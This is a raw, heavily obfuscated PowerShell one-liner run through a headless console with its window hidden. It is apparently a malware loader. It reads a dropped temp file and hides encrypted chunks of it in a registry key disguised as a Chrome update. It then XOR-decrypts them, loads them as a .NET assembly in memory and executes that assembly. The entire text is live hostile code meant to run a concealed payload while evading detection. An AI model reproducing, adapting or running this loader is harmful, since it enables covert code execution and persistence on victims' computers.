conhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 5849) + (-1551 -Bor 5849) + 4465 - 8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE -Force};.([char]((934 - 8315 + 4511 + 2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path ${KdOtym`Lvy`P`Znrx} KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"